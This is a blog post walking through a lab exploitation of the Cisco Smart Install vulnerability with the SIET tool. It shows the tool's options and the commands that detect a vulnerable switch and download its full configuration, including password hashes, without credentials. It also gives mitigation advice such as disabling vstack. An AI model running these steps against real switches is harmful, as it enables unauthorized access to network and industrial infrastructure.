Monday, May 20, 2019

Attacking the Cisco Smart Install Vulnerability

The Cisco Smart Install service has been around for a long time, at least back to IOS 12.2.55. It suffers from a serious security vulnerability that allows an unauthenticated user to download the configuration or execute commands on the switch. Cisco released updates in late 2018 to resolve the issue but there are probably millions of switches out there that haven't been upgraded yet.

Here is an article from the guys that found the exploit https://embedi.org/blog/cisco-smart-install-remote-code-execution/. Their PoC code crashes the switch. As always, a crash is the first step in developing a usable exploit.

They list the following models as vulnerable:

  • Catalyst 4500 Supervisor Engines
  • Catalyst 3850 Series
  • Catalyst 3750 Series
  • Catalyst 3650 Series
  • Catalyst 3560 Series
  • Catalyst 2960 Series
  • Catalyst 2975 Series
  • IE 2000
  • IE 3000
  • IE 3010
  • IE 4000
  • IE 4010
  • IE 5000
  • SM-ES2 SKUs
  • SM-ES3 SKUs
  • NME-16ES-1G-P
  • SM-X-ES3 SKUs


Notice it includes the Industrial Ethernet series. That's unfortunate given that those switches are likely to be in industrial plants and other locations where an attacker can do real physical damage.


My advice is to add "no vstack" to your deployment template unless you are actually using Smart Install. Also, as a Cisco best practice, the switch's management plane should be on a vlan that is only accessible to trusted users.

There is a working exploit available from this github repository - SIET.

As you can see in the exploit description, there are several things you can do:

-t test device for smart install.
-g get device config.
-c change device config.
-u update device IOS.
-e execute commands in the device's console.
-i ip address of target device
-l ip list of targets (file path)
--thread-count number of threads to be spawned

Let's exploit a switch

As always, do not run this on a switch you don't own or have explicit written permission to.

Is vstack running? 

The tool can quickly check

->sudo python siet.py -t -i 192.168.10.52
[INFO]: Sending TCP packet to 192.168.10.52
[INFO]: Smart Install Client feature active on 192.168.10.52
[INFO]: 192.168.10.52 is affected


If you are logged into a switch there are a couple quick ways to verify
3750x#sh tcp brief all 
TCB       Local Address           Foreign Address        (state)
078C6E60  192.168.10.52.22        192.168.10.183.50902   ESTAB
07B162A8  *.4786                  *.*                    LISTEN
06FA06BC  *.443                   *.*                    LISTEN
06F9FCFC  *.443                   *.*                    LISTEN
06F9F33C  *.80                    *.*                    LISTEN
06F9E97C  *.80                    *.*                    LISTEN

Having port 4786 open means Smart Install is running.

or

3750x#sh vstack config 
 Role: Client (SmartInstall enabled)
 Vstack Director IP address: 0.0.0.0

 *** Following configurations will be effective only on director ***
 Vstack default management vlan: 1
 Vstack start-up management vlan: 1
 Vstack management Vlans: none
 Join Window Details:
Window: Open (default)
Operation Mode: auto (default)
 Vstack Backup Details:
Mode: On (default)
Repository: 

Note that is says "Vstack default management vlan: 1" but I am successfully attacking on vlan 10.

So Smart Install is running on a 3750-x in my lab. The switch is running c3750e-universalk9-mz.150-2.SE10. I started out with c3750e-universalk9-tar.152-4.E7 but the switch would reload when I ran the tool with Smart Install enabled. Once I installed c3750e-universalk9-mz.150-2.SE10 I was able to download the full configuration without any credentials or SNMP RW string.

NOTE: The tool uses its own python tftp server so it will fail if you already have a tftp server running. In my case I had just uploaded the 15.2.SE10 firmware and the tftp server was running. It took me a minute to figure out why the tool was failing:
[INFO]: binding socket .. error: [Errno 98] Address already in use

First, let's see who's logged into the switch


3750x#who
    Line       User       Host(s)              Idle       Location
*  1 vty 0     mhubbard   idle                 00:00:00 192.168.10.183

What type of authentication is in use

3750x#sh run | sec aaa 
aaa new-model
aaa group server radius ISE-group
 server name ISE
!

3750x#test aaa group ISE-group mhubbard ************** new-code 
User successfully authenticated

USER ATTRIBUTES

service-type         0   7 [NAS Prompt]
Framed-Protocol      0   1 [PPP]
service-type         0   2 [Framed]
priv-lvl             0   15 (0xF)

So the switch is using RADIUS authentication and is connected to the RADIUS Server. I know that for sure because my account password had expired and I had to log into my Windows server and change it before I could log into the switch!

Download the configuration without any credentials

Run the Smart Install Exploitation Tool with the "-g" flag to download the configuration:

~/Dropbox/03_Tools/SIET$ 
->sudo python siet.py -g -i 192.168.10.52
-= DvK =- TFTP server 2017(p)
[INFO]: Directory already exists. OK.
[INFO]: binding socket .. ok
[INFO]: Sending TCP packet to 192.168.10.52 
[INFO]: Package send success to 192.168.10.52: 
[INFO]: Getting config done
[INFO]: All done! Waiting 60 seconds for end of connections...
[INFO]: connect from  192.168.10.52 58422
[INFO]:[192.168.10.52] puting file 192.168.10.52.conf octet
[INFO]:[192.168.10.52]:[put] success binding data port 44000
[INFO]:[192.168.10.52]:[put] file tftp/192.168.10.52.conf finish download, size: 14351

Show the file in SIET's tftp folder

mhubbard@1S1K-G5-5587:~/Dropbox/03_Tools/SIET/tftp$ 
->ls -l
total 20
-rw-r--r-- 1 root root 14351 May 19 21:53 192.168.10.52.conf
-rw-r--r-- 1 root root    51 Mar  5 14:33 execute.txt


Display the configuration that was downloaded

cat 192.168.10.52.conf 

!
! No configuration change since last restart
!
version 15.0
no service pad
service timestamps debug datetime msec
service timestamps log datetime msec
service password-encryption
!
hostname 3750x
!
boot-start-marker
boot-end-marker
!
!
enable secret 5 $1$Ew15$ZstYXs4B38G/T710NavOV1
!
username cisco privilege 15 secret 5 $1$llTp$rNcLr9Y7GkG/zVmOdHNVR1
username hubbard privilege 15 secret 5 $1$5WVT$zWpFHuH2/FdDcQlOOchfS1
aaa new-model
!
!
aaa group server radius ISE-group
 server name ISE
!

Conclusion

Cisco Smart Install is very useful if you support remote sites without IT staff but you must be aware of this vulnerability. If you use the Cisco best practice of ACLing the management plane to only a trusted network you are probably not at much risk until you upgrade.

Speaking of Cisco best practices, the guys that wrote SIET also write a fantastic tool called the Cisco Configuration Analysis Tool (CCAT). It takes your switch config and runs it against the "Hardening Cisco IOS Devices" document and shows all the best practices that you are running and more importantly, any that you are missing.

You can check out the CCAT here